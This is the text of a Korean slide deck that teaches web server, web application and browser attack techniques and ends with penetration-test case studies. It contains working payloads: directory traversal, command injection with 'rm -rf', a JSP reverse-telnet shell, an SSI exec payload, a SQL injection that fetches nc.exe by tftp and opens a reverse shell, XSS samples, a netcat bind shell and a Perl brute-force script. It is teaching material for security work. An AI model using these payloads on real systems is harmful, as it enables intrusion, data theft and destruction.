1
웹 보안 취약점과 공격기술
김 진 열
- 1 -Web Hacking
목차
1. 웹 보안 개요
1. 웹 환경의 변화
2. 웹 보안의 필요성
3. 웹 보안의 한계
2. 웹 보안 취약점 및 공격기법
1. 웹 서버의 보안 취약점 및 공격기법
2. 웹 어플리케이션 보안 취약점 및 공격기법
3. 웹 브라우저 보안 취약점 및 공격기법
3. Case Study
2
- 2 -Web Hacking
1. 웹 보안 개요
- 3 -Web Hacking
1.1 웹 환경의 변화
단순 정보공유환경
기업의 중요정보시스템
환경
CGI, SSI,
Javas
cript
VBScript,
ASP, PH
P, JS
P
HTML,
XHTML,
DHTML
XML
Secure HTTP
SSL/TLS, SET
서비스의 다양화, 고급화, 복잡화
Web Services
J2EE, .NET
• 정보서비스의 표준인터페이스
• 비즈니스 Enabler
• 단순 정보검색, 정보공유 도구
• 개인, 기업 홍보수단
• 웹 포털• 웹 기반 전자상거래• 기업 포털
3
- 4 -Web Hacking
1.1 웹 환경의 변화
WebServer DB
DB
Web app
WebClient Web app
Web app
Web app
HTTPrequest
(cleartextor SSL)
HTTP reply(HTML,
Javascript, VBscript,
etc)
Plugins:•Perl•C/C++•JSP, etc
Database connection:•ADO,•ODBC, etc.
SQL Database
•Apache•IIS•Netscapeetc…
Firewall
- 5 -Web Hacking
1.2 웹 보안의 필요성
― 웹 보안 위협 증가
웹 기반의 정보서비스, 전자상거래 활성화로 인한고급 정보 및 직접적인 이득 획득 기회 증가
네트웍 보안 솔루션 도입 및 보안강화로 해커들의공격 타겟이 상대적으로 취약한 웹으로 이동
― 웹 보안 취약점 증가
보다 나은 서비스, 다양한 서비스로 인한 웹 서버의기능확장으로 security hole 증가
HTTP 프로토콜의 Stateless 특성으로 인한구조적인 보안 취약점이 내재함.
4
- 6 -Web Hacking
1.3 웹 보안의 한계
― 방화벽(Packet Filtering Firewall)의 한계
Perimeter 보안 솔루션: HTTP Port(80) 허가
Layer 3-4: not Application Layer
― 침입탐지시스템(NIDS)의 한계
Detection Only, False-Positive/Negative
공격이 일어난 후 탐지: 이미 정보유출
암호화된 패킷(SSL)의 공격유형 탐지 불가
― 웹 브라우저 보안대책 미흡
개인 사용자가 스스로 보안위협을 제거하기 어렵고, 불법적인 정보수집, 정보유출, 악의적인 공격에직접적으로 노출.
- 7 -Web Hacking
2. 웹 보안 취약점 및 공격기법
WebServer DB
DB
Web app
WebClient Web app
Web app
Web app
web server mis-configuration
• URL Interpretation Attacks.
― URL Interpretation Attacks
5
- 8 -Web Hacking
2. 웹 보안 취약점 및 공격기법
― Input Validation Attacks
WebServer DB
DB
Web app
WebClient Web app
Web app
Web app
poor checking of user inputs
URL Interpretation attacks
• Input Validation attacks.
- 9 -Web Hacking
2. 웹 보안 취약점 및 공격기법
― SQL Query Poisoning
WebServer DB
DB
Web app
WebClient Web app
Web app
Web app
Input Validation attacks
Extend SQL statements
URL Interpretation attacks
• SQL Query Poisoning
6
- 10 -Web Hacking
2. 웹 보안 취약점 및 공격기법
― HTTP Session Hijacking
WebServer DB
DB
Web app
WebClient Web app
Web app
Web app
Reverse-engineering HTTP cookies.
Input Validation attacks
SQL query poisoning
URL Interpretation attacks
• HTTP session hijacking.
• Impersonation.
- 11 -Web Hacking
2.1 웹 서버의 보안 취약점 및 공격기법
― 웹 서버 구현상의 보안 취약점 URL Parsing Error― IIS Unicode bug
Buffer Overflow Source Code Disclosure― IIS “+.htr” bug, “showcode.asp”― WebLogic/WebSphere “*.JSP” bug
Web Architecture Attacks― Handler Forcing
No Logs(POST request payload) HTTP header(Referer:, User-Agent:, etc)
7
- 12 -Web Hacking
(1) URL Parsing Error
― “.”, “..” and “...” Requests
― “%00” Requests
― Lots of “/” Requests
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html
- 13 -Web Hacking
(1) URL Parsing Error
― IIS Unicode bug Exploit:
http://10.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
%c0%af = “/”
Can use HTTP POST to send multiple commands at a time to cmd.exe.
8
- 14 -Web Hacking
(2) Source Code Disclosure
― IIS “+.htr” bug. View source code of ASP/ASA files.
URL interpretation vulnerability.http://10.0.0.1/global.asa+.htr
“.htr” causes ISM.DLL to handle the URL.
Characters after the “+” sign (space) are ignored.
- 15 -Web Hacking
(2) Source Code Disclosure
― IIS, “showcode.asp” Bundled with IIS samples in NT Option Pack
4.0.
Allows an attacker to view arbitrary files using the following URL:
http://10.0.0.1/msadc/showcode.asp?source=/msadc/../../../../../boot.ini
9
- 16 -Web Hacking
(2) Source Code Disclosure
― IIS, “showcode.asp”
- 17 -Web Hacking
(2) Source Code Disclosure
― WebLogic / WebSphere “JSP” bug. Discovered by Shreeraj Shah, Foundstone.
Ability to retrieve source code of JSP/JHTML files.
Classic example of web server mis-configuration.
Using uppercase “JSP” in the URL causes the server to return unparsed JSP code.
10
- 18 -Web Hacking
(2) Source Code Disclosure
― Example
- 19 -Web Hacking
(2) Source Code Disclosure
― How it works
Java Runtime
index.jspProcessJSP tags
JavaCompiler
jsphandler
defaulthandler
index.JSP = index.jsp
htmlhandler
shtmlhandler
jhtmlhandler
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
HTTP Request:index.JSP
Web
Logi
cSe
rver
XX
11
- 20 -Web Hacking
(2) Source Code Disclosure
― URL prefixes for source code disclosure: /servlet/file/ (IBM WebSphere)
/file/ (BEA WebLogic)
/*.shtml/ (BEA WebLogic)
/ConsoleHelp/ (BEA WebLogic)
/servlet/com.sun.server.http.servlet.FileServlet/ (Sun JavaWebServer)
Advisories on Foundstone’s advisories page: http://www.foundstone.com/advisories.htm
- 21 -Web Hacking
(3) Handler Forcing
― Web Architecure Attacks Sometimes the way web servers are
implemented can lead to vulnerabilities.
A common attack is to bypass the web server configuration directives, and invoke built-in procedures directly.
A close look at the web server architecture can reveal holes.
12
- 22 -Web Hacking
(3) Handler Forcing
― Web Architecture
Java Runtime
WebServer
htmlhandler
html
jsp
??
text/htmlheader
/bin/sh
includefile
shtml
text/htmlheader
ProcessSSI tags
#exec#include
script/execu--table
ProcessJSP tags
JavaCompiler
class
shtmlhandler
jsphandler
defaulthandler
cgihandler
text/htmlheader
cgish,perl,…
- 23 -Web Hacking
(3) Handler Forcing
― Handler Forcing Vulnerability Certain mis-configurations allow for handlers
to be forced onto files that are not supposed to be processed by them.
Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned “as-is”.
Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time!
13
- 24 -Web Hacking
(3) Handler Forcing
― Sun Java Web Server: Direct servlet invocation by the /servlet/
prefix.
Can force the PageCompile handler (servlet) on any file in the web document directory.
Files get compiled and executed as JSPs!
Discovered by Shreeraj Shah, Foundstone.
Exploit:http://10.0.0.2/servlet/com.sun.server.http.pagecompile.jsp.runtime.
JspServlet/path/to/file.html
- 25 -Web Hacking
(3) Handler Forcing
Java Runtime
WebServer
ProcessJSP tags
JavaCompiler
class
jsphandler
htmlhandler
htmltext/htmlheader
JSP PageCompile
handler forced on to html files
14
- 26 -Web Hacking
(3) Handler Forcing
• On NT:
• JSP code for invoking cmd.exe:<%String s=null,t="";try{Processp=Runtime.getRuntime().exec(“cmd /c dir c: /w");BufferedReader sI = new BufferedReader(newInputStreamReader(p.getInputStream()));while((s=sI.readLine())!=null){t+=s;}}catch(IOException e){e.printStackTrace();}%>
<%=t %>
- 27 -Web Hacking
(3) Handler Forcing
• On Unix (if xterm is not present):
• JSP code for “Reverse Telnet”:<%String s=null,t="";try{Processp=Runtime.getRuntime().exec(“/bin/sh ‘telnet 10.0.0.11 2000 | /bin/sh | telnet 10.0.0.11 2001’");BufferedReader sI = new BufferedReader(newInputStreamReader(p.getInputStream()));while((s=sI.readLine())!=null){t+=s;}}catch(IOException e){e.printStackTrace();}%>
<%=t %>
15
- 28 -Web Hacking
(4) HTTP Header Manipulation
― Web Server Fingerprinting: HTTP Banner grabbing.
netcat as a TCP client (even telnet works)nc 10.0.0.1 80HEAD / HTTP/1.0
Advanced HTTP directives:― TRACE, OPTIONS, etc.
- 29 -Web Hacking
2.1 웹 서버의 보안 취약점 및 공격기법
― 웹 서버 설정오류로 인한 보안 취약점
Information Disclosure― Directory Traversal
― Sample files, backup/test files enumeration
HTTP Basic Authentication― Brute Force Attack
SSI bug― Options Includes(#exec, #include)
16
- 30 -Web Hacking
(1) Information Disclosure
― Directory Browsing Index Listings Original Location:
― http://www.foo.com/dir3/dir2/dir1/file.html
Try:
― http://www.foo.com/dir3/dir2/dir1/
― http://www.foo.com/dir3/dir2/
― http://www.foo.com/dir3/
― Tools: Whisker
― http://www.wiretrip.net/
- 31 -Web Hacking
(1) Information Disclosure
― File Enumeration
Sample Files
Template Directories
Temp or Backup files
Hidden Files
Vulnerable CGIs
17
- 32 -Web Hacking
(2) HTTP Basic Authentication
― HTTP Basic Authtication
웹상에서의 보안을 위해 .htpasswd 와 .htaccess 두파일을 이용해 디렉토리 인증을 한다.
htpasswd [-c] passwordfile username― Password파일을 생성(.htpasswd)
.htaccess 파일을 생성
AuthName “staff area”AuthType BasicAuthUserFile /usr/local/etc/httpd/usersrequire user valid-user
- 33 -Web Hacking
(2) HTTP Basic Authentication
― Weak Authentication
클라이언트의 브라우저와 웹 서버 사이에 패스워드가아무런 암호화 없이 전송 되어 진다.― ASCII 를 Base64 형식으로 encoding하여 전송한다.
인증 기능과 더불어 다른 기능이나 제한과 같은 부가기능들을 이용할 수 없다.
Sniffing을 통해 basic authentication의 정보를 도청해낼 수 있다.
도청해 낸 정보를 이용하여 사용자의 정보를 알아 낸다.― Authorization: Basic bmFta2M6MTExMQ==
18
- 34 -Web Hacking
(3) SSI Bug
SSI (Server Side Includes) tags allow commands to be executed locally on the system via #exec tags.
Some applications save user inputs on a local file.
Malicious SSI tags can be uploaded via such applications.
The result: Remote Command Execution!
- 35 -Web Hacking
(3) SSI Bug
― guestbook.pl
― One of the many free CGI scripts available.
― Vulnerable on servers that parse .html files through SSI.
19
- 36 -Web Hacking
(3) SSI Bug
― Insert SSI tags as guestbook comments.
cat /etc/passwd; xterm &
- 37 -Web Hacking
(3) SSI Bug
― How it works
webserver
guestbook.pladdguest.html
guestbook.html
<!--#exec cmd=“cat /etc/passwd; /usr/X11/bin/xterm -display 10.1.1.14:0.0”
mod_ssi
Guestbook comment contains SSI tagwhich is saved in guestbook.html on theserver.
20
- 38 -Web Hacking
(3) SSI Bug
― How it works
webserver
guestbook.pladdguest.html
guestbook.htmlmod_ssi
<!--#exec cmd=“cat /etc/passwd; /usr/X11/bin/xterm -display 10.1.1.14:0.0”
passwdxterm
.html files are registered to be parsed bymod_ssi, causing the SSI tags to beparsed and the command executed.
- 39 -Web Hacking
2.1 웹 서버의 보안 취약점 및 공격기법
― 웹 어플리케이션 구현상의 보안 취약점
Input Validation Error― Unescaped special characters
― File Upload/Remote Execution vulnerability
― SQL Query Poisoning/SQL Injection
Information Disclosure― Hard-coded information: ID/Passwd, Comments
― Hidden FORM field value manipulation
― Client-side script validation error
Cross-Site Scripting
21
- 40 -Web Hacking
(1) Unescaped special characters
― File Separator(;)require “cgi-lib.pl”;
$to = $in{‘to’};$subject = $in{‘subject’};$msg = $in{‘msg’};open(FILE, “|mail $to –s $subject”);print FILE $msg;close (FILE);
Massively insecure:
Consider: http://xx.com/cgi-bin/[email protected];rm%20-rf%20*;
- 41 -Web Hacking
(1) Unescaped special characters
― Path/Directory Traversal(../)require “cgi-lib.pl”;
$message_id = $in{‘message’};$forum_dir = “./CgiDiscussion”;open(FILE, “$forum_dir/$message_id”);while (<FILE>) {
print <FILE>;};close (FILE);
Normally:http://xx.com/cgi-bin/bbs_forum.pl?message=1-2.msg
But Consider: http://xx.com/cgi-bin/bbs_forum.pl?message=../../../etc/passwd
22
- 42 -Web Hacking
(1) Unescaped special characters
― More Path/Directory Traversal
DotDot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/passwd
Dot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/././passwd
Double DotDot Slash:
http://foo.com/app.cgi?dir=path/to/data....//….//….//etc/passwd
- 43 -Web Hacking
(1) Unescaped special characters
― Poisoning Null Byte(%00)• The session id was tied to a file similar to the form
[session_id].dat• The input was validated to some degree /^*.dat$/ (.dat
exists at the end)• When it came to opening and rewriting the file though,
Perl’s open() command was used.• Perl’s open command passed the filename to the
operating system• The problem is that OS system calls treat null bytes
(\0) as ending the string, but Perl does not• So although the file was being checked for validity by
making sure it had a .dat suffix the script was still vulnerable…
23
- 44 -Web Hacking
(1) Unescaped special characters
― Poisoning Null Byte(%00)• Consider
• http://x.com/cgi-bin/vulnerable.cgi?file=/etc/passwd%00.dat
• The file passes the Perl regex because it does end in .dat
• But the system call to open the file ends at /etc/passwd allowing the user access!
- 45 -Web Hacking
(1) Unescaped special characters
― Double dots or Not double dots…• So a lot of people know to filter input so that directory
traversal doesn’t work…• Or does it?
• If ($file =~ /\.\./) { die (“Stop! Hacker!”); }• Similar to the Null Byte attack, system calls may
interpret things different from what you expect…• http://x.com/cgi-
bin/vulnerable.cgi?file=\.\./.\.\/etc/passwd• Note that the literal \ in the URL. Perl will fail the
regex from before• /\.\./ just checks for literal periods.
24
- 46 -Web Hacking
(2) File Upload/Remote Execute
1) PHP Script File Upload
- 47 -Web Hacking
(2) File Upload/Remote Execute
2) Remote CMD Execution Using PHP Script
aaa.php?cmd=/usr/X11R6/bin/xterm%20-display%20192.168.192.2:0
25
- 48 -Web Hacking
(2) File Upload/Remote Execute
3) Gain a Nobody & Root Shell by BOF exploit
Set UID(root)가 설정된 hantermbuffer overflow
- 49 -Web Hacking
(3) SQL Query Poisoning
― Poor input validation on parameters passed to SQL queries can be disastrous.
― For example:
Dim sql_con, result, sql_qryConst CONNECT_STRING =
"Provider=SQLOLEDB;SERVER=WEB_DB;UID=sa;PWD=xyzzy"
sql_qry = "SELECT * FROM PRODUCT WHERE ID = “ &Request.QueryString(“ID”)
Set objCon = Server.CreateObject("ADODB.Connection")objCon.Open CONNECT_STRINGSet objRS = objCon.Execute(strSQL)
26
- 50 -Web Hacking
(3) SQL Query Poisoning
― Return all rows:http://10.0.0.3/showtable.asp?
ID=3+OR+1=1
― Resultant query:SELECT * FROM PRODUCT WHERE ID = 3 OR
1 = 1
- 51 -Web Hacking
(3) SQL Query Poisoning
― Drop Table:http://10.0.0.3/showtable.asp?
ID=3%01DROP+TABLE+PRODUCT
― Resultant query:SELECT * FROM PRODUCT WHERE ID = 3DROP TABLE PRODUCT
27
- 52 -Web Hacking
(3) SQL Query Poisoning
― Remote Command Execution!http://10.0.0.3/showtable.asp?
ID=3%01EXEC+master..xp_cmdshell+‘tftp+-i+10.0.0.13+GET+nc.exe+%26%26+nc+-e+cmd.exe+10.0.0.11+2000’
― Command executed:tftp -i 10.0.0.13 GET nc.exe &&
nc -e cmd.exe 10.0.0.11 2000
- 53 -Web Hacking
(3) SQL Query Poisoning
― How it works
IIS 4.0DBASP
tftpserver
nc.exe
WebBrowser
C:\>_
1
23
listener at port 2001 to receive the connection
tftp server to get nc.exe transferred over to the NT IIS box.
SELECT * FROM PRODUCT WHERE ID=3EXEC master..xp_cmdshelltftp -i 10.0.0.13 GET nc.exe &&nc -e cmd.exe 10.0.0.11 2000
28
- 54 -Web Hacking
(4) Hidden FORM value manipulation
$129.95
― $129.95
- 55 -Web Hacking
(4) Hidden FORM value manipulation
― <input type=“hidden” name=“Price” value=“129.95”>
29
- 56 -Web Hacking
(4) Hidden FORM value manipulation
― <input type=“hidden” name=“Price” value=“1.95”>
- 57 -Web Hacking
(4) Hidden FORM value manipulation
― $1.95
30
- 58 -Web Hacking
2.2 웹브라우저 보안 취약점 및 공격기법
HTTP Session Hijacking― Cookie Poisoning
Cross-site scripting― Hyperlink, Frame, Window spoofing
― Cookie Stealing
서비스 방해 공격(denial of service)― Hostile & annoying Applets,
― Malicious Javascript
기타― 사회 공학적 공격(social engineering attack)― 웹브라우저에서의 지시에 충실한 사용자를 이용
- 59 -Web Hacking
(1) HTTP Session Hijacking
― Cookie의 개요
웹 클라이언트측에 저장되는 세션정보(< 4KB)
등장배경: HTTP 프로토콜의 connectionless(=stateless)특성으로 트랜잭션 처리 어려움.
― Cookie의 구성
Set-Cookie: name=value; expires=[Date]; domain=[Domain]; path=[Path]; [secure]
― Cookie의 응용분야: 웹 사이트의 방문기록, 사용자 인증(id/passwd)
전자상거래(쇼핑카트) 트랜잭션 정보저장
― Cookie의 보안이슈
개인의 프라이버시 침해: 불법적인 개인정보수집
31
- 60 -Web Hacking
(1) HTTP Session Hijacking
― Cookie Poisoning
- 61 -Web Hacking
(1) HTTP Session Hijacking
― Cookie Poisoning
32
- 62 -Web Hacking
(1) HTTP Session Hijacking
― Cookie Poisoning
- 63 -Web Hacking
(1) HTTP Session Hijacking
― Cookie Poisoning
33
- 64 -Web Hacking
(2) XSS(Cross-Site Scripting)
- 65 -Web Hacking
(2) XSS(Cross-Site Scripting)
― Click to Execute― User must click on a link to execute the script.― (Search Fields, 404 Errors, etc.)
― http://www.foo.com/NOFILE/<SCRIPT>alert(‘JavaScriptLaunched’);</SCRIPT>
― Mass Injection― All user viewing the page execute the script.― (Guest Books, Message Boards)
― Post a JavaScript onto a board
― Message <SCRIPT>alert(‘JavaScript Launched’);</SCRIPT>
34
- 66 -Web Hacking
(2) XSS(Cross-Site Scripting)
― Directed Injection― Soon as user load the page, script executes.― (WebMail, HTML Mail, Messaging)
― Send an email with…― HELLO <SCRIPT>alert(‘JavaScript Launched’);</SCRIPT>
― Holding the door open― (FeedBack, Profiles Pages, anything persistent…)
― Load HTML Page with sourced scripts.
― <LAYER SRC=“javascript.js”></LAYER>
- 67 -Web Hacking
3. Case Study
1. The Worldcup Ticketting
2. Inappropriate Board Administration
3. Tomcat Web Server Vulnerability
4. Weak User Authentication
35
- 68 -Web Hacking
3.1 The Worldcup Ticketting
(1) Look at glance…
- 69 -Web Hacking
3.1 The Worldcup Ticketting
(2) View and analyze the HTML source
36
- 70 -Web Hacking
3.1 The Worldcup Ticketting
(3) Get the Ticketing HTML template
- 71 -Web Hacking
3.1 The Worldcup Ticketting
(4) Success! “꿈은 이루어진다”
37
- 72 -Web Hacking
3.2 Inappropriate Board Admin
― Information gathering RPC – 외부 접근불가
SNMP – 외부접근불가
XDM― UDP로 동작하는 XDMCP(177/UDP)에 대해서는 열려져
있는것으로 추정되지만 외부로 나가는 6000-6063/TCP에대하여 BLOCK되어있는것으로추정되며실제연결이불가능
Apache Web Server― Apache 1.3.6이 TCP/80에동작중이였으며, JSP엔진으로
JRun이동작중인것으로 확인.
- 73 -Web Hacking
3.2 Inappropriate Board Admin
― Vulnerability Analysis
특정 ACL에서 열린 구역을 제외한 TCP 연결은 불가능
웹서버가 동작하고 있는 80/tcp에는 Apache가동작중이였으며 알려진 취약점은 발견되지 않음.
Jrun의 디폴트 페이지가 있었지만 관련 디폴트 서블릿, 페이지들은존재하지 않음.
8081/tcp포트가 열려있었지만 JRun 포트인지 기타다른포트인지는 확인이 불가능
웹서비스 페이지에 다수의 취약점을 발견
38
- 74 -Web Hacking
3.2 Inappropriate Board Admin
― Attack Scenario
직접 웹서버의 /로 접근할경우 JRun의 디폴트페이지만 보여 실제 내부의 컨텐츠를 알수가없으므로 다른서버의 사이트맵에서 URL의 경로를확인하여 취약한 웹서비스를 찾는것을 시도
웹서버의 공격방법중 가장 많이 사용되며 웹서버보안의 큰 이슈가 되고있는 Server-side Script Uploading 기법으로 공격을 시도
- 75 -Web Hacking
3.2 Inappropriate Board Admin
― Attack.. Jrun Default Page― / 디렉토리에 Jrun
디폴트페이지 존재, 그러나, Sample Servlet Page는존재하지 않음.
39
- 76 -Web Hacking
3.2 Inappropriate Board Admin
인증없는 Admin 게시판
발견― 주변서버의
sitemap페이지를사용하여 BBS에 존재하는URL을 검색하였다.(홈페이지 소스분석)
― 이중 /jsp/Notify/news 와/jsp/Notify/research에admin1.jsp 페이지를추측하여 알아냄.
Internet
BBS other
Webpages
- 77 -Web Hacking
3.2 Inappropriate Board Admin
JSP Upload― 일반사용자가 파일을 업로딩 할 수 있는 게시판은
찾지 못하였으며 URL의 추측으로 admin게시판을찾아냄.
― jsp/Notify/research/admin1.jsp를 사용하여내부명령을 실행시킬수 있는 코드를 삽입한JSP파일을 업로딩
― JSP엔진이 root권한으로 동작하여 root권한으로내부명령을 실행 시킬 수 있음
40
- 78 -Web Hacking
3.2 Inappropriate Board Admin
― JSP File Upload & Remote Execute
- 79 -Web Hacking
3.2 Inappropriate Board Admin
― Successful! Port binding shell
― 직접 쉘을 띄우기 위해 포트바인딩 툴인 netcat을업로딩하여 업로딩된 JSP 를 사용하여 포트에바인딩하여 직접 쉘로 접근 하였다.
― 포트는 ACL에서 열려있는 8080-8600포트중 사용되지않고있는 포트를 사용하였다.
― 업로딩된 hacker.jsp에서 실행
/tmp/h4ckers/nc –l –p 8150 –e /bin/sh
― 작업자의 클라이언트에서 해당포트로 접속(client)$ nc bbs.target.com 8150
id
uid=0(root) gid=1(other)
41
- 80 -Web Hacking
3.3 Tomcat Vulnerability
― Port Scanning
Port State Protocol Service7 open tcp echo9 open tcp discard13 open tcp daytime19 open tcp chargen21 open tcp ftp23 open tcp telnet25 open tcp smtp80 open tcp http111 open tcp sunrpc443 open tcp https891 open tcp unknown1428 open tcp informatik-lm1429 open tcp nms8080 open tcp http-proxy
nmap –P0 –sS 192.168.192.100
- 81 -Web Hacking
3.3 Tomcat Vulnerability
― Gathering the information.
― Analyze the information
telnet 192.168.192.100 80Trying ....
HEAD / HTTP/1.0....
Sendmail 8.9.3 (PHNE_18979)/8.7.Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java HP-UX Java)HP-UX B.10.20 PA-RISC
42
- 82 -Web Hacking
3.3 Tomcat Vulnerability
― BugTraq: Jakarta-tomcat.../admin
- 83 -Web Hacking
3.3 Tomcat Vulnerability
― Trying to attack the vulnerabilities.
43
- 84 -Web Hacking
3.3 Tomcat Vulnerability
― Add new context…
- 85 -Web Hacking
3.3 Tomcat Vulnerability
― http://target.com:8080/ttest/
44
- 86 -Web Hacking
3.3 Tomcat Vulnerability
― Results Get the system passwd file
Get the Database passwd
http://www.target.com:8080/ttest/etc/passwd
http://www.target.com:8080/ttest/data1/cmwhome/tools/dba/ora_passecmwdbuser/ecmwdbpwd
- 87 -Web Hacking
3.4 Weak User Authentication
― Network Map
인터넷Hacker
웹서버#1
웹서버#2
All
443
80
53
25
IBM HTTP 1.3.2.1/Apache 1.3.2
OpenHTTP
N/ACloseSSL/HTTPS
Open
Closed
Open
결과
거의 모든 포트가 열려있음.All UDP ServicesUDP
N/ADNS
RMS serviceSMTP
TCP
비고서비스포트번호
45
- 88 -Web Hacking
3.4 Weak User Authentication
A. JSP Soure File Download & Analysis]
― redir-2.2.1(http://sammy.net/~sammy/hacks) 프로그램을 이용하여 대상서버에 접속하였고, 공격에필요한 웹서버의 모든 JSP 파일의 소스보기 및다운로드가 가능하였다.
― 공격 과정에서 JSP 소스 파일 분석을 통해서 웹서버의디렉토리 구조를 파악할 수 있었으며, 웹 응용프로그램간에 주고받는 데이터 및 데이터 포멧 등을분석하는데 이용되었다.
- 89 -Web Hacking
3.4 Weak User Authentication
― Port redirect using redir.
46
- 90 -Web Hacking
3.4 Weak User Authentication
― JSP File Download
- 91 -Web Hacking
3.4 Weak User Authentication
― B. 게시판 관리자정보 노출
주변서버의홈페이지(http://2XX.1XX.5X.2XX)를통해 게시판관리자 페이지의
URL을 얻을 수 있었고,
각 게시판의 관리자 정보
(관리자, 로그인 ID 등)을
획득.
47
- 92 -Web Hacking
3.4 Weak User Authentication
― 관리자 정보(이름/ID 등) 획득
- 93 -Web Hacking
3.4 Weak User Authentication
― C. 추 측 하 기 쉽 거 나크랙되기 쉬운 패스워드사용
http://2xx.1xx.5x.5x/xxx/adm/index.jsp파 일 의 소 스 코 드 를분 석 하 여 패 스 워 드구성에 관한 정보를획 득 하 였 다 . 패스워드는 숫자, 영어소문자 및 대문자로구 성 되 며 , 최 대9자리로 구성됨을 알수 있었다.
48
- 94 -Web Hacking
3.4 Weak User Authentication
HTTP-FORM 형태의 사용자 인증에 대한 패스워드크랙 프로그램인 wwwhack(http://www.wwwhack.com, Not available any more)
프로그램을 이용하여 패스워드 크랙을 시도하였다.
- 95 -Web Hacking
3.4 Weak User Authentication
― Brute Force Attack http://2xx.1xx.5xx5/xxx/adm/indexxxx.jsp 파 일 내 부 의
인증 처리방식이 일반적인 HTML 웹 페이지와 달라wwwhack 프로그램을 이용한 패스워드 크랙은 실패함.
49
- 96 -Web Hacking
3.4 Weak User Authentication
― 텍스트 모드로 크랙을 할 수 있도록 Perl 스크립트 언어를이용하여 패스워드 크랙 프로그램을 작성
#!/usr/bin/perl
use Socket;
$protocol=getprotobyname('tcp');$address=inet_aton($ARGV[0]);$port=$ARGV[1];$remote=sockaddr_in($port, $address);$id=$ARGV[2];print STDOUT "start...₩n";
open(PWD, "<password.txt");$i=0;$crack="no";
while($pwd=<PWD>) {$pwd =~ s/₩n//;$i=$i+1;print STDERR "Trying($i) :$id/$pwd₩n";&crack;goto END if($crack eq "yes");}END:close(PWD);exit(0);
sub crack {
socket(NOC, &PF_INET, &SOCK_STREAM, $protocol) or die "can't create socket₩n";setsockopt(NOC, SOL_SOCKET, SO_REUSEADDR, 1);
connect(NOC, $remote) or die "can't connect to $ARGV[0]₩n";$message="GET /isw/adm/indexmanag.jsp?id=$id&pwd=$pwdHTTP/1.0₩n₩n";send(NOC, $message, 0);vec($rt,fileno(NOC), 1) = 1;while(!select($r=$rt, undef, undef, 0.00001)) {}$input="";while(1) {$error="no";recv(NOC, $readin, 1, 0) || undef $error;if(! $error) { goto OK;}goto OK if($readin eq "");$input = $input . $readin;if($readin eq "₩n") {if(index($input, "index.jsp") ne -1) {print STDERR "**************************************************₩n";print STDERR "******** Password Found Successfully ! ***********₩n";print STDERR "**************************************************₩n";print STDOUT "ID=$id, PASSWORD=$pwd₩n";$crack="yes";goto OK;}$input="";}}SUCCESS:close(NOC);if($crack eq "yes") { return; }
OK:close(NOC);}
- 97 -Web Hacking
3.4 Weak User Authentication
― 패스워드 크랙결과
50
- 98 -Web Hacking
3.4 Weak User Authentication
― 게시판 관리자로 로그인 성공
- 99 -Web Hacking
3.4 Weak User Authentication
― 기쁨 그리고 슬픔!
게시판 관리자의 ID로 로그인 하였고, 게시판에 올라온게시물에 대한 수정,삭제 기능은 가능하였으나,
해당 게시판은 파일 업로딩 기능이, 없었으며, 게시판의설정을 변경할 수 없음.
다시 시작: 수퍼관리자 패스워드 크랙시도
51
- 100 -Web Hacking
3.4 Weak User Authentication
― 재시도: 수퍼관리자 패스워드 크랙
ID=193930086, PASSWORD=happy
- 101 -Web Hacking
3.4 Weak User Authentication
― 수퍼관리자로 로그인 & 게시판관리
52
- 102 -Web Hacking
3.4 Weak User Authentication
― 게시판 글쓰기 및 파일업로드
- 103 -Web Hacking
3.4 Weak User Authentication
― 새로운 게시판 생성(파일업로드 가능한)
53
- 104 -Web Hacking
3.4 Weak User Authentication
― JSP File Upload
- 105 -Web Hacking
3.4 Weak User Authentication
― Success, but failed.
54
- 106 -Web Hacking
3.4 Weak User Authentication
― Last chance, but…
- 107 -Web Hacking
3.4 Weak User Authentication
― Learn from ...
used old (unpatced) web server
misconfiguration
inappropriate server administration
inappropriate ID/Passwd management
55
- 108 -Web Hacking
4. 웹 보안 대책
- 109 -Web Hacking
5. 결론
― What on earth makes it insecure ? Technology itself.
Hackers, malicious users
Its Application.
People who make, use and manage it.
― So then, what makes it secure ? Firewall, IDS, and …
Secure Programming
Manage.― Plan-Do-Check-Action